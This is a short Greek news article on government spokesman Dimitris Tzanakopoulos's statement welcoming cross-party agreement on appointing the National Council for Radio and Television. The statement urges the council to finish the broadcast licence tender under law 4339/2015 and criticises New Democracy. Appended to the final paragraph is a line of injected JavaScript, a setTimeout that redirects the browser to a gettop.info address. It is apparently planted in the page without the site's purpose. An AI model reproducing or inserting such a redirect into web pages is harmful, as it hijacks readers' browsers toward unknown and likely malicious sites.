Τζανακόπουλος: Το ΕΣΡ καλείται να ολοκληρώσει άμεσα το διαγωνισμό

0
8

 

Η επιτευχθείσα συναίνεση μεταξύ των πολιτικών κομμάτων για τη συγκρότηση του Εθνικού Συμβουλίου Ραδιοτηλεόρασης αποτελεί για την κυβέρνηση ένα αποφασιστικό βήμα στην κατεύθυνση της ρύθμισης του ραδιοτηλεοπτικού τοπίου, όπως αναδεικνύεται από τη δήλωση του κυβερνητικού εκπροσώπου Δημήτρη Τζανακόπουλου, μετά το τέλος της συνεδρίασης της Διάσκεψης των Προέδρων.

Ο Δ. Τζανακόπουλος υπογραμμίζει το «βαρύ καθήκον» του ΕΣΡ να ολοκληρώσει το συντομότερο δυνατόν το διαγωνισμό εφαρμόζοντας το νόμο 4339/2015, τον αποκαλούμενο «νόμο Παππά» δηλαδή.

«Μετά από έξι διαδοχικές συνεδριάσεις της Διάσκεψης των Προέδρων της Βουλής για τον διορισμό των μελών του νέου Εθνικού Συμβουλίου Ραδιοτηλεόρασης συμπληρώθηκε η κατά το Σύνταγμα αναγκαία πλειοψηφία.

Η συναίνεση που επιτεύχθηκε μεταξύ των πολιτικών κομμάτων αποτελεί ένα αποφασιστικό βήμα για την ρύθμιση του ραδιοτηλεοπτικού τοπίου μετά από 27 ολόκληρα χρόνια παραθεσμικής και ασύδοτης λειτουργίας των ραδιοτηλεοπτικών σταθμών», υπογραμμίζει ο κ. Τζανακόπουλος, που ασκεί, παραλλήλως, κριτική στο κόμμα της αξιωματικής αντιπολίτευσης.

«Ακόμη και η ΝΔ μετά την γενική κατακραυγή -η οποία αποτυπώθηκε και σε πρόσφατες μετρήσεις της κοινής γνώμης- αναγκάστηκε να υποχωρήσει και να επιστρέψει στην νομιμότητα. Έπραξε, έστω και τώρα, αυτό που όφειλε να έχει πράξει από την πρώτη στιγμή τηρώντας τη συνταγματική της υποχρέωση», υποστηρίζει ο κυβερνητικός εκπρόσωπος.

Η δήλωση του Δ. Τζανακόπουλου κλείνει με αυτό που καλείται να πράξει από εδώ και πέρα το ΕΣΡ, το οποίο αναλαμβάνει τώρα ένα βαρύ καθήκον: Να διεξάγει και να ολοκληρώσει το συντομότερο δυνατόν το διαγωνισμό για τις ραδιοτηλεοπτικές άδειες εφαρμόζοντας το νόμο 4339/2015. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here